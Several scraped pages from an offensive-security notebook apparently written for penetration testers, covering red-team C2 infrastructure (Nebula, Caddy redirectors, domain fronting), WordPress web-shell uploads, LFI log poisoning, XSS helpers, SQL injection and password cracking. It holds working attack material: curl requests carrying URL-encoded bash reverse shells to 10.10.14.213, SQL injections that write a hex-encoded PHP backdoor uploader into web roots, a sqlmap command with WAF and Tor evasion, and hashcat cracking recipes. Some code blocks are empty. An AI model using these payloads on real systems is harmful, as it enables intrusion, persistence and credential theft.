[https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki) * [https://github.com/mgeeky/RedWarden](https://github.com/mgeeky/RedWarden) * [\[PDF\] Orchestrating Resilient Red Team Operations (Yiannis Ioannides)](https://github.com/secgroundzero/BSides-Cyprus-2019/blob/master/bsides_Cyprus_Yiannis.pdf) [](https://ppn.snovvcra.sh/red-team/infrastructure#nebula) Nebula ---------------------------------------------------------------------- * [https://github.com/slackhq/nebula/releases](https://github.com/slackhq/nebula/releases) * [https://www.defined.net/nebula/config/](https://www.defined.net/nebula/config/) * [https://notes.huskyhacks.dev/blog/red-team-infrastructure-done-right](https://notes.huskyhacks.dev/blog/red-team-infrastructure-done-right) Install: Copy $ sudo mkdir -p /opt/nebula/certs $ sudo eget -s linux/amd64 --download-only "slackhq/nebula" --to /opt/nebula && cd /opt/nebula $ sudo tar -xzvf nebula-linux-amd64.tar.gz && sudo rm nebula-linux-amd64.tar.gz $ sudo mv nebula-cert certs && cd certs Make certs for the **lighthouse**, **teamserver** and **proxy** (redirector): Copy $ sudo ./nebula-cert ca -name 'hax0r1337, Inc.' $ sudo ./nebula-cert sign -name lighthouse -ip "10.10.13.1/24" $ sudo ./nebula-cert sign -name teamserver -ip "10.10.13.2/24" -groups "teamservers" $ sudo ./nebula-cert sign -name proxy1 -ip "10.10.13.37/24" -groups "proxies" Configs: Lighthouse Teamserver Proxy Systemd [unit](https://github.com/slackhq/nebula/blob/master/examples/quickstart-vagrant/ansible/roles/nebula/files/systemd.nebula.service) : [](https://ppn.snovvcra.sh/red-team/infrastructure#caddy) Caddy -------------------------------------------------------------------- * [https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure](https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure) * [https://caddyserver.com/docs/install](https://caddyserver.com/docs/install) * [https://github.com/caddyserver/caddy/releases](https://github.com/caddyserver/caddy/releases) * [https://improsec.com/tech-blog/staging-cobalt-strike-with-mtls-using-caddy](https://improsec.com/tech-blog/staging-cobalt-strike-with-mtls-using-caddy) * [https://github.com/improsec/CaddyStager](https://github.com/improsec/CaddyStager) * [https://github.com/XiaoliChan/RedCaddy](https://github.com/XiaoliChan/RedCaddy) Install from apt: Install from a release: Configure and run: Manually requesting Let's Encrypt certificate: Config sample to act as a reverse proxy: [](https://ppn.snovvcra.sh/red-team/infrastructure#domain-fronting) Domain Fronting ---------------------------------------------------------------------------------------- * [https://chigstuff.com/blog/metasploit-domain-fronting-with-microsoft-azure/](https://chigstuff.com/blog/metasploit-domain-fronting-with-microsoft-azure/) ### [](https://ppn.snovvcra.sh/red-team/infrastructure#faslty) Faslty * [https://fortynorthsecurity.com/blog/fastly-and-fronting/](https://fortynorthsecurity.com/blog/fastly-and-fronting/) * [https://github.com/vysecurity/DomainFrontingLists/blob/c4612cf436330a587b6a9beb0fc73b771dba3bdc/Fastly.txt](https://github.com/vysecurity/DomainFrontingLists/blob/c4612cf436330a587b6a9beb0fc73b771dba3bdc/Fastly.txt) [](https://ppn.snovvcra.sh/red-team/infrastructure#tools) Tools -------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/red-team/infrastructure#autossh) autossh * [https://linux.die.net/man/1/autossh](https://linux.die.net/man/1/autossh) Create and maintain an SSH tunnel from the team server to redirector `proxy1` in the background: Last updated 2 years ago * [Nebula](https://ppn.snovvcra.sh/red-team/infrastructure#nebula) * [Caddy](https://ppn.snovvcra.sh/red-team/infrastructure#caddy) * [Domain Fronting](https://ppn.snovvcra.sh/red-team/infrastructure#domain-fronting) * [Faslty](https://ppn.snovvcra.sh/red-team/infrastructure#faslty) * [Tools](https://ppn.snovvcra.sh/red-team/infrastructure#tools) * [autossh](https://ppn.snovvcra.sh/red-team/infrastructure#autossh) lighthouse.yml Copy pki: ca: /opt/nebula/certs/ca.crt cert: /opt/nebula/certs/lighthouse.crt key: /opt/nebula/certs/lighthouse.key static_host_map: "10.10.13.1": [":4242"] lighthouse: am_lighthouse: true listen: host: 0.0.0.0 port: 4242 punchy: punch: true tun: disabled: false dev: nebula1 drop_local_broadcast: false drop_multicast: false tx_queue: 500 mtu: 1300 routes: unsafe_routes: logging: level: info format: text firewall: conntrack: tcp_timeout: 12m udp_timeout: 3m default_timeout: 10m max_connections: 100000 outbound: - port: any proto: any host: any inbound: - port: any proto: icmp host: any - port: 4789 proto: any host: any - port: 22 proto: any cidr: 10.10.13.0/24 teamserver.yml Copy pki: ca: /opt/nebula/certs/ca.crt cert: /opt/nebula/certs/teamserver.crt key: /opt/nebula/certs/teamserver.key static_host_map: "10.10.13.1": [":4242"] lighthouse: am_lighthouse: false interval: 60 hosts: - "10.10.13.1" listen: host: 0.0.0.0 port: 4242 punchy: punch: true tun: disabled: false dev: nebula1 drop_local_broadcast: false drop_multicast: false tx_queue: 500 mtu: 1300 routes: unsafe_routes: logging: level: info format: text firewall: conntrack: tcp_timeout: 12m udp_timeout: 3m default_timeout: 10m max_connections: 100000 outbound: - port: any proto: any host: any inbound: - port: any proto: icmp host: any - port: any proto: tcp group: proxies - port: 80 proto: any host: any - port: 443 proto: any host: any - port: 4789 proto: any host: any - port: 22 proto: any cidr: 10.10.13.0/24 proxy1.yml Copy pki: ca: /opt/nebula/certs/ca.crt cert: /opt/nebula/certs/proxy1.crt key: /opt/nebula/certs/proxy1.key static_host_map: "10.10.13.1": [":4242"] lighthouse: am_lighthouse: false interval: 60 hosts: - "10.10.13.1" listen: host: 0.0.0.0 port: 4242 punchy: punch: true tun: disabled: false dev: nebula1 drop_local_broadcast: false drop_multicast: false tx_queue: 500 mtu: 1300 routes: unsafe_routes: logging: level: info format: text firewall: conntrack: tcp_timeout: 12m udp_timeout: 3m default_timeout: 10m max_connections: 100000 outbound: - port: any proto: any host: any inbound: - port: any proto: icmp host: any - port: 80 proto: any host: any - port: 443 proto: any host: any - port: 4789 proto: any host: any - port: 22 proto: any cidr: 10.10.13.0/24 /etc/systemd/system/nebula.service Copy [Unit] Description=nebula Wants=basic.target After=basic.target network.target [Service] SyslogIdentifier=nebula ExecReload=/bin/kill -HUP $MAINPID ExecStart=/opt/nebula/nebula -config /opt/nebula/.yml Restart=always [Install] WantedBy=multi-user.target Copy $ sudo apt install debian-keyring debian-archive-keyring apt-transport-https -y $ curl -1sLf https://dl.cloudsmith.io/public/caddy/stable/gpg.key | sudo tee /etc/apt/trusted.gpg.d/caddy-stable.asc $ curl -1sLf https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt | sudo tee /etc/apt/sources.list.d/caddy-stable.list $ sudo apt update $ sudo apt install caddy -y Copy $ eget -qs linux/amd64 "caddyserver/caddy" --to /tmp/caddy.deb $ sudo dpkg -i /tmp/caddy.deb && rm /tmp/caddy.deb Copy $ sudo rm /etc/caddy/Caddyfile && sudo vi /etc/caddy/Caddyfile $ sudo systemctl restart caddy $ sudo systemctl status caddy Copy $ sudo apt install certbot -y $ sudo certbot certonly --standalone -d example.com --register-unsafely-without-email --agree-tos $ sudo mkdir -p /opt/caddy/ssl $ sudo cp /etc/letsencrypt/live/example.com/{fullchain.pem,privkey.pem} /opt/caddy/ssl $ sudo chown -R caddy:caddy /opt/caddy /etc/caddy/Caddyfile Copy { log #debug admin off #default_sni example.com #auto_https disable_redirects servers { protocols h1 } } (logging) { log { output file /var/log/caddy-{args.0}-access.log { roll_size 1Mib roll_uncompressed roll_local_time roll_keep 24 roll_keep_for 7d } } } (proxy-upstream) { @ua_denylist { header User-Agent curl* #not header User-Agent *hax0r* } @ip_denylist { remote_ip 8.8.8.8/32 } header { -Server +X-Robots-Tag "noindex, nofollow, nosnippet, noarchive" +X-Content-Type-Options "nosniff" } #redir @ua_denylist https://legit.com{uri} permanent respond @ua_denylist "Forbidden" 403 { close } respond @ip_denylist "Forbidden" 403 { close } reverse_proxy https://10.10.13.2:31337 { header_up Host {upstream_hostport} header_up X-Forwarded-Host {host} header_up X-Forwarded-Port {port} transport http { tls_insecure_skip_verify } } } https://example.com { import logging all #tls /opt/caddy/ssl/fullchain.pem /opt/caddy/ssl/privkey.pem handle /files/* { file_server { # There should be this "files" directory in root root /home/snovvcrash/www #browse } } handle { import proxy-upstream } } Copy (teamserver)$ autossh -M 0 -f -N proxy1 ~/snovvcrash/.ssh/config Copy Host proxy1 HostName 10.10.13.37 User snovvcrash Port 22 IdentityFile /home/snovvcrash/.ssh/id_proxy1 RemoteForward 8443 localhost:443 ServerAliveInterval 30 ServerAliveCountMax 3 --- # WordPress | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/web/wordpress.md) . * [https://www.hackingarticles.in/wordpress-reverse-shell/](https://www.hackingarticles.in/wordpress-reverse-shell/) [](https://ppn.snovvcra.sh/pentest/web/wordpress#custom-plugin) Custom Plugin ---------------------------------------------------------------------------------- Write a web shell with a custom plugin. Copy a plugin shell from SecLists and zip it: Copy $ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php . $ zip plugin-shell.zip plugin-shell.php Upload `plugin-shell.zip` (Plugins > Add New) and install it (Upload Plugin > Browse... > Install Now) **but do not activate**! Now you can access the web shell: Copy $ curl 'http://10.10.13.37/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami' [](https://ppn.snovvcra.sh/pentest/web/wordpress#wpscan) wpscan -------------------------------------------------------------------- * [https://github.com/wpscanteam/wpscan](https://github.com/wpscanteam/wpscan) * [https://wpscan.com/profile](https://wpscan.com/profile) Copy $ wpscan --url http://10.10.13.37/wp/ --api-token --force -e ap [--plugins-detection aggressive] --disable-tls-checks -o wpscan.out $ wpscan --url http://10.10.13.37/wp/ --api-token --force --passwords /usr/share/seclists/Passwords/darkweb2017-top1000.txt --disable-tls-checks Last updated 8 months ago * [Custom Plugin](https://ppn.snovvcra.sh/pentest/web/wordpress#custom-plugin) * [wpscan](https://ppn.snovvcra.sh/pentest/web/wordpress#wpscan) --- # LFI / RFI | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/web/lfi-rfi.md) . [](https://ppn.snovvcra.sh/pentest/web/lfi-rfi#php-rfi-with-smb) PHP RFI with SMB -------------------------------------------------------------------------------------- * [http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html) `/etc/samba/smb.conf`: Copy log level = 3 [share] comment = TEMP path = /tmp/smb writable = no guest ok = yes guest only = yes read only = yes browsable = yes directory mode = 0555 force user = nobody Copy $ chmod 0555 /tmp/smb $ chown -R nobody:nogroup /tmp/smb $ service smbd restart $ tail -f /var/log/samba/log. [](https://ppn.snovvcra.sh/pentest/web/lfi-rfi#log-poisoning) Log Poisoning -------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/web/lfi-rfi#php) PHP * [https://medium.com/bugbountywriteup/bugbounty-journey-from-lfi-to-rce-how-a69afe5a0899](https://medium.com/bugbountywriteup/bugbounty-journey-from-lfi-to-rce-how-a69afe5a0899) * [https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1) Access log (needs single `'` instead of double `"`): Error log: Last updated 4 years ago * [PHP RFI with SMB](https://ppn.snovvcra.sh/pentest/web/lfi-rfi#php-rfi-with-smb) * [Log Poisoning](https://ppn.snovvcra.sh/pentest/web/lfi-rfi#log-poisoning) * [PHP](https://ppn.snovvcra.sh/pentest/web/lfi-rfi#php) Copy $ nc 127.0.0.1 80 GET / $ curl 'http://127.0.0.1/vuln2.php?id=....//....//....//....//....//var//log//apache2//access.log&cmd=%2Fbin%2Fbash%20-c%20%27%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.213%2F1337%200%3E%261%27' Or $ curl 'http://127.0.0.1/vuln2.php?id=....//....//....//....//....//proc//self//fd//1&cmd=%2Fbin%2Fbash%20-c%20%27%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.213%2F1337%200%3E%261%27' Copy $ curl -X POST 'http://127.0.0.1/vuln1.php' --form "userfile=@docx/sample.docx" --form 'submit=Generate pdf' --referer 'http://nowhere.com/' $ curl 'http://127.0.0.1/vuln2.php?id=....//....//....//....//....//var//log//apache2//error.log&cmd=%2Fbin%2Fbash%20-c%20%27%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.213%2F1337%200%3E%261%27' Or $ curl 'http://127.0.0.1/vuln2.php?id=....//....//....//....//....//proc//self//fd//2&cmd=%2Fbin%2Fbash%20-c%20%27%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.213%2F1337%200%3E%261%27' --- # SOP / CORS | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/web/sop-cors.md) . * [https://portswigger.net/web-security/cors/same-origin-policy](https://portswigger.net/web-security/cors/same-origin-policy) * [https://portswigger.net/web-security/cors](https://portswigger.net/web-security/cors) * [https://github.com/RUB-NDS/CORStest](https://github.com/RUB-NDS/CORStest) [](https://ppn.snovvcra.sh/pentest/web/sop-cors#cors-server) CORS Server ----------------------------------------------------------------------------- An HTTPS server with CORS header accepting connections from any domain in Flask: cors.py Copy from flask import Flask, send_file from flask_cors import CORS app = Flask(__name__) CORS(app) @app.route('/xss.js', methods=['GET']) def xss(): return send_file('./xss.js', download_name='xss.js') # openssl req -x509 -newkey rsa:4096 -nodes -out cert.pem -keyout key.pem -days 365 app.run(host='0.0.0.0', port=443, ssl_context=('cert.pem', 'key.pem')) Last updated 4 years ago --- # C2 | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/c2.md) . * [https://www.thec2matrix.com/matrix](https://www.thec2matrix.com/matrix) * [https://xakep.ru/2019/10/18/post-exploitation-frameworks/](https://xakep.ru/2019/10/18/post-exploitation-frameworks/) * [https://medium.com/@lsecqt/using-discord-as-command-and-control-c2-with-python-and-nuitka-8fdced161fdd](https://medium.com/@lsecqt/using-discord-as-command-and-control-c2-with-python-and-nuitka-8fdced161fdd) [](https://ppn.snovvcra.sh/pentest#rat-tools) RAT Tools ------------------------------------------------------------ * [https://breakingsecurity.net/remcos/](https://breakingsecurity.net/remcos/) * [https://jetlogger.app/](https://jetlogger.app/) * [https://github.com/quasar/Quasar](https://github.com/quasar/Quasar) * [https://github.com/moom825/xeno-rat](https://github.com/moom825/xeno-rat) Last updated 6 months ago --- # XSS | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/web/xss.md) . Ultimate checker: `'"/>`. [](https://ppn.snovvcra.sh/pentest/web/xss#redirections) Redirections -------------------------------------------------------------------------- * [https://developer.mozilla.org/ru/docs/Web/HTTP/Redirections](https://developer.mozilla.org/ru/docs/Web/HTTP/Redirections) Copy [](https://ppn.snovvcra.sh/pentest/web/xss#data-grabbers) Data Grabbers ---------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/web/xss#cookies) Cookies * [https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies](https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-stealing-cookies) Img tag: Copy Fetch: Copy [](https://ppn.snovvcra.sh/pentest/web/xss#xmlhttprequest) XMLHttpRequest ------------------------------------------------------------------------------ ### [](https://ppn.snovvcra.sh/pentest/web/xss#xss-to-lfi) XSS to LFI * [https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html](https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html) ### [](https://ppn.snovvcra.sh/pentest/web/xss#xss-to-csrf) XSS to CSRF * [https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf](https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf) If the endpoint is accessible only from localhost: With capturing CSRF token first: Last updated 4 years ago * [Redirections](https://ppn.snovvcra.sh/pentest/web/xss#redirections) * [Data Grabbers](https://ppn.snovvcra.sh/pentest/web/xss#data-grabbers) * [Cookies](https://ppn.snovvcra.sh/pentest/web/xss#cookies) * [XMLHttpRequest](https://ppn.snovvcra.sh/pentest/web/xss#xmlhttprequest) * [XSS to LFI](https://ppn.snovvcra.sh/pentest/web/xss#xss-to-lfi) * [XSS to CSRF](https://ppn.snovvcra.sh/pentest/web/xss#xss-to-csrf) Copy Copy Copy Copy --- # WPA / WPA2 | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2.md) . [Enterprise](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/enterprise) [Personal](https://ppn.snovvcra.sh/pentest/wi-fi/wpa-wpa2/personal) Last updated 3 years ago --- # Password Brute Force | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/password-brute-force.md) . * [https://weakpass.com/](https://weakpass.com/) * [https://habr.com/ru/company/deiteriylab/blog/584160/](https://habr.com/ru/company/deiteriylab/blog/584160/) [](https://ppn.snovvcra.sh/pentest/password-brute-force#hashcat) hashcat ----------------------------------------------------------------------------- Copy $ hashcat --example-hashes | grep -B1 -i md5 $ hashcat -m 500 hashes/file.hash /usr/share/wordlists/rockyou.txt --username $ hashcat -m 500 hashes/file.hash --username --show Benchmarks: Copy $ nvidia-smi.exe # MD5 $ hashcat -m 0 -b # NTLM $ hashcat -m 1000 -b Единица хэшрейта Хэшрейт Хэши в секунду 1kH/s 1000 Тысяча 1MH/s 1000000 Одинмиллион 1GH/s 1000000000 Одинмиллиард 1TH/s 1.000.000.000.000 Одинтриллион 1PH/s 1.000.000.000.000.000 Одинквадриллион 1EH/s 1.000.000.000.000.000.000 Одинквинтиллион 1ZH/s 1.000.000.000.000.000.000.000 Одинсекстиллион ### [](https://ppn.snovvcra.sh/pentest/password-brute-force#tgs-rep-with-ntlm-wordlist) TGS-REP with NTLM Wordlist * [https://github.com/hashcat/hashcat/pull/2607#issuecomment-850653034](https://github.com/hashcat/hashcat/pull/2607#issuecomment-850653034) Remove the following lines from `m13100_a0-optimized.cl` and compile: To crack: Last updated 3 years ago * [hashcat](https://ppn.snovvcra.sh/pentest/password-brute-force#hashcat) * [TGS-REP with NTLM Wordlist](https://ppn.snovvcra.sh/pentest/password-brute-force#tgs-rep-with-ntlm-wordlist) Copy // K=MD4(Little_indian(UNICODE(pwd)) append_0x80_2x4 (w0_t, w1_t, pw_len); make_utf16le (w1_t, w2_t, w3_t); make_utf16le (w0_t, w0_t, w1_t); w3_t[2] = pw_len * 8 * 2; w3_t[3] = 0; digest[0] = MD4M_A; digest[1] = MD4M_B; digest[2] = MD4M_C; digest[3] = MD4M_D; md4_transform (w0_t, w1_t, w2_t, w3_t, digest); // K1=MD5_HMAC(K,1); with 2 encoded as little indian on 4 bytes (02000000 in hexa); w0_t[0] = digest[0]; w0_t[1] = digest[1]; w0_t[2] = digest[2]; w0_t[3] = digest[3]; w1_t[0] = 0; w1_t[1] = 0; w1_t[2] = 0; w1_t[3] = 0; w2_t[0] = 0; w2_t[1] = 0; w2_t[2] = 0; w2_t[3] = 0; w3_t[0] = 0; w3_t[1] = 0; w3_t[2] = 0; w3_t[3] = 0; Copy $ hashcat -m 13100 -O tgsrep.in ntlm.wordlist --self-test-disable --hex-wordlist --- # Generate Wordlists | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists.md) . [](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists#tools) Tools -------------------------------------------------------------------------------------------- * [https://github.com/lctrcl/crwg](https://github.com/lctrcl/crwg) ### [](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists#hashcat) hashcat Potentially valid usernames, `John Doe` as an example: * [https://activedirectorypro.com/active-directory-user-naming-convention/](https://activedirectorypro.com/active-directory-user-naming-convention/) Copy $ cat << EOF >> passwords.txt johndoe jdoe j.doe doe EOF Common usernames: Copy $ cat << EOF >> passwords.txt admin administrator root guest sa changeme password EOF Common patterns: Add year and exclamation point to the end of each password: Mutate the wordlist with hashcat rules: ### [](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists#kwprocessor) kwprocessor * [https://github.com/hashcat/kwprocessor](https://github.com/hashcat/kwprocessor) ### [](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists#cewl) cewl * [https://github.com/digininja/CeWL](https://github.com/digininja/CeWL) ### [](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists#psudohash) psudohash * [https://github.com/t3l3machus/psudohash](https://github.com/t3l3machus/psudohash) Last updated 1 year ago * [Tools](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists#tools) * [hashcat](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists#hashcat) * [kwprocessor](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists#kwprocessor) * [cewl](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists#cewl) * [psudohash](https://ppn.snovvcra.sh/pentest/password-brute-force/generate-wordlists#psudohash) Copy $ cat << EOF >> passwords.txt January February March April May June July August September October November December Autumn Fall Spring Winter Summer password Password P@ssw0rd secret Secret S3cret EOF Copy $ for i in $(cat passwords.txt); do echo "${i}"; echo "${i}\!"; echo "${i}2020"; echo "${i}2020\!"; done > t $ cp t passwords.txt Copy $ hashcat --force --stdout passwords.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule |sort -u |awk 'length($0) > 7' > t $ cp t passwords.txt Copy $ ./kwp basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > passwords.txt Copy $ cewl -d 5 -m 5 -w passwords.txt --with-numbers --email_file emails.txt http://megacorp.local/somedir/logs/html/index.htm Copy $ python3 psudohash.py -w megacorp [-cpa] -y 2022,2023 --- # SQLi | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/web/sqli.md) . [](https://ppn.snovvcra.sh/pentest/web/sqli#mysql) MySQL ------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/web/sqli#dios) DIOS * [https://defcon.ru/web-security/2320/](https://defcon.ru/web-security/2320/) * [http://www.securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-1.html](http://www.securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-1.html) * [https://dba.stackexchange.com/questions/4169/how-to-use-variables-inside-a-select-sql-server](https://dba.stackexchange.com/questions/4169/how-to-use-variables-inside-a-select-sql-server) * [https://www.mssqltips.com/sqlservertip/6038/sql-server-derived-table-example/](https://www.mssqltips.com/sqlservertip/6038/sql-server-derived-table-example/) Copy id=1' UNION SELECT 1,(SELECT (@a) FROM (SELECT (@a:=0x00),(SELECT (@a) FROM (information_schema.columns) WHERE (@a) IN (@a:=concat(@a,'',table_schema,'',' ::: ','',table_name,'','
'))))a);-- - SELECT (@a) FROM ( SELECT(@a:=0x00), ( SELECT (@a) FROM (information_schema.schemata) WHERE (@a) IN (@a:=concat(@a,schema_name,'\n')) ) ) foo Copy id=1' UNION SELECT 1,(SELECT (@a) FROM (SELECT (@a:=0x00),(SELECT (@a) FROM (mytable.users) WHERE (@a) IN (@a:=concat(@a,':::',id,':::',login,':::',password)) AND is_admin='1'))a);-- - ### [](https://ppn.snovvcra.sh/pentest/web/sqli#truncation-attack) Truncation Attack ### [](https://ppn.snovvcra.sh/pentest/web/sqli#commas-blocked-by-waf) Commas blocked by WAF ### [](https://ppn.snovvcra.sh/pentest/web/sqli#write-file) Write File ### [](https://ppn.snovvcra.sh/pentest/web/sqli#read-file) Read File [](https://ppn.snovvcra.sh/pentest/web/sqli#ms-sql) MS SQL --------------------------------------------------------------- * [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/) * [https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/](https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/) [](https://ppn.snovvcra.sh/pentest/web/sqli#sqlmap) sqlmap --------------------------------------------------------------- * [Usage · sqlmapproject/sqlmap Wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage) * [PayloadsAllTheThings/SQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#sql-injection-using-sqlmap) Write file: Test WAF: * [https://www.1337pwn.com/use-sqlmap-to-bypass-cloudflare-waf-and-hack-website-with-sql-injection/](https://www.1337pwn.com/use-sqlmap-to-bypass-cloudflare-waf-and-hack-website-with-sql-injection/) Last updated 4 years ago * [MySQL](https://ppn.snovvcra.sh/pentest/web/sqli#mysql) * [DIOS](https://ppn.snovvcra.sh/pentest/web/sqli#dios) * [Truncation Attack](https://ppn.snovvcra.sh/pentest/web/sqli#truncation-attack) * [Commas blocked by WAF](https://ppn.snovvcra.sh/pentest/web/sqli#commas-blocked-by-waf) * [Write File](https://ppn.snovvcra.sh/pentest/web/sqli#write-file) * [Read File](https://ppn.snovvcra.sh/pentest/web/sqli#read-file) * [MS SQL](https://ppn.snovvcra.sh/pentest/web/sqli#ms-sql) * [sqlmap](https://ppn.snovvcra.sh/pentest/web/sqli#sqlmap) Copy POST /index.php HTTP/1.1 Host: 127.0.0.1 name=snovvcrash&email=admin%example.com++++++++++11&password=qwe12345 Copy id=-1' UNION SELECT * FROM (SELECT 1)a JOIN (SELECT table_name from mysql.innodb_table_stats)b ON 1=1# Copy id=1' UNION ALL SELECT 1,2,3,4,"&1');} ?>",6 INTO OUTFILE 'C:\\Inetpub\\wwwroot\\backdoor.php';# id=1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '/var/www/html/backdoor.php' LINES TERMINATED BY 0x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d2f7661722f7777772f68746d6c2f3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a;-- - Copy id=1' UNION ALL SELECT LOAD_FILE('c:\\xampp\\htdocs\\admin\\db.php'),2,3-- - Copy $ sqlmap -r request.req --batch --file-write=./backdoor.php --file-dest=C:/Inetpub/wwwroot/backdoor.php Copy $ sqlmap.py -u 'https://127.0.0.1/index.php' --data='{"id":"*"}' -p id --identify-waf --tamper='between,randomcase,space2comment' --random-agent --tor --check-tor --thread=1 -b --batch -v6 --- # Infrastructure | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure.md) . Copy cd; mkdir ws; cd ws # workspace mkdir -p adcs/ discover/{subnets,hosts,services} enum/bloodhound/bloodhound.py loot/ log/ screenshots/ shells/ tickets/ traffic/ videos/ touch ~/ws/loot/net-ntlmv2.txt [](https://ppn.snovvcra.sh/pentest/infrastructure#network-config) Network Config ------------------------------------------------------------------------------------- Copy hostname ifconfig eth0 route -n cat /etc/resolv.conf arp -a Last updated 3 years ago --- # Virtualization | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/admin/virtualization.md) . [Docker](https://ppn.snovvcra.sh/admin/virtualization/docker) [Hyper-V](https://ppn.snovvcra.sh/admin/virtualization/hyper-v) [VirtualBox](https://ppn.snovvcra.sh/admin/virtualization/virtualbox) [VMWare](https://ppn.snovvcra.sh/admin/virtualization/vmware) Last updated 3 years ago --- # VMWare | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as 